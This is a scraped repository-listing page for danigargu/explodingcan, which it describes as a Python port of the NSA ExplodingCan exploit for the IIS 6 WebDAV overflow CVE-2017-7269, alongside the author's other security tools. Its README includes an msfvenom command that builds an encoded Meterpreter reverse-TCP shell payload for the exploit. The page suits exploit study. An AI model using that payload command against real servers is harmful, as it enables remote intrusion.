Top Rating
- Top Contributors
  Discover the Top Open Source contributors by country or by language
- Interviews
  Discover real stories from Open Source developers
Discover

Discover your Favorite Language
Discover the top trending repositories and projects on Github. Explore the latest trends in your preferred languages.

PHP

Shell

C++

Scala

Kotlin

Dart

Assembly

Nix

More Languages
Awesome

Awesome repositories
Discover the most awesome repositories and projects of your favorite languages. Inspired by the Awesome-* lists trend in GitHub.

Rust

Crystal

Elixir

Julia

Ada

Swift

Racket

C

More Languages
By Country

Rankings by Country
Discover the community of talented open source contributors in each country.

🇪🇷 Eritrea

🇿🇲 Zambia

🇵🇬 Papua New Guinea

🇹🇰 Tokelau

🇶🇦 Qatar

🇬🇼 Guinea-Bissau

🇺🇦 Ukraine

🇰🇭 Cambodia

All Countries Compare Countries

danigargu/explodingcan

Stars
258
Rank 158,189 (Top 4 %)
Language
Python
Created almost 7 years ago
Updated almost 7 years ago

danigargu

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

An implementation of NSA's ExplodingCan exploit in Python

ExplodingCan

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

Details

Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
CVE: CVE-2017-7269
Disclosure date: March 31 2017
Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode

Links

CVE-2020-0796

CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost

1,293

heap-viewer

IDA Pro plugin to examine the glibc heap, focused on exploit development

Python

720

deREferencing

IDA Pro plugin that implements more user-friendly register and stack views

Python

489

syms2elf

A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table

Python

192

IDAtropy

IDAtropy is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib.

Python

128

urlfuzz

Another web fuzzer written in NodeJS

JavaScript

ratone

A console for assemble/disassemble code using capstone/keystone

Python

ida-scripts

Misc IDA Pro scripts

Python

my_challenges

A repository of challenges I've created

wargames

Solutions for some wargames and ctfs.

Python

danigargu.github.io

HTML

danigargu/explodingcan

danigargu

Reviews

Repository Details

ExplodingCan

Details

Why?

Shellcode

Links

More Repositories